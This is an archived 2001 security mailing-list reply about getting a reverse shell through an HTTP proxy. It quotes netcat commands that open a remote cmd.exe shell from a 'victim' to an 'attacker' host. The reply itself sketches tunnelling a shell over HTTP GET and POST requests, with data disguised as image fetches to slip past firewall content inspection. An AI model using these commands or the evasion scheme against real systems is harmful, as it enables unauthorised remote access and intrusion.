RE: Reverse Http Shell Solution
From: Frank Knobbe (FKnobbe@KnobbeITS.com)Date: 10/19/01
- Previous message: H D Moore: "Re: Lab leads??"
- Maybe in reply to: Vinicius Dalesandro: "Reverse Http Shell Solution"
- Next in thread: David Sexton: "RE: Reverse Http Shell Solution"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Message-ID: <32CD6FE22EAB444BB1D27C10949A0E7C14FDC1@server1.home.knobbeits.com> From: Frank Knobbe <FKnobbe@KnobbeITS.com> To: "'GrandmastrPlague@aol.com'" <GrandmastrPlague@aol.com>, vdalesandro@proteus.com.br Subject: RE: Reverse Http Shell Solution Date: Thu, 18 Oct 2001 20:55:58 -0500
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
> -----Original Message-----
> From: GrandmastrPlague@aol.com [mailto:GrandmastrPlague@aol.com]
> Sent: Thursday, October 18, 2001 2:02 PM
>
> It seems like this question has been asked a million times
> before, but here goes the same old answer again... use netcat
> On attacker machine:
> nc -l -p 80
> On victim machine:
> nc -d -e cmd.exe attacker 80
>
> Make sure you set up the listening machine first.
I believe Vinícius meant that there is no way for a straight through
connection as netcat would establish, but instead the requirement to
send GET requests to the proxy which will fetch a page for you.
Netcat won't do that. You would have to have a reverse shell that
operates on a HTTP GET and PUT basis.
You could modify netcat to do that. Instead of using TCP/UDP
connections, you can replace that mechanism with HTTP GET and PUT
ways of shuffling data, pumping that back to stdin/stdout. The only
catch is to fetch the data correctly as some firewalls will do
content inspection. One way to get around that is to pump data with
POSTs to a form as normal, but receive data via GET's from images in
the web page, or just request for images a'la http://h4x0r/data.gif.
Regards,
Frank
-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.5.8
Comment: PGP or S/MIME (X.509) encrypted email preferred.
iQA/AwUBO8+ILpytSsEygtEFEQIpdACfcW0ho5zq0dzoNYY0dWkId3qhhosAnjOo
7M3sMCeCgjkYKDpMousASMQa
=MS16
-----END PGP SIGNATURE-----
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
- Previous message: H D Moore: "Re: Lab leads??"
- Maybe in reply to: Vinicius Dalesandro: "Reverse Http Shell Solution"
- Next in thread: David Sexton: "RE: Reverse Http Shell Solution"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
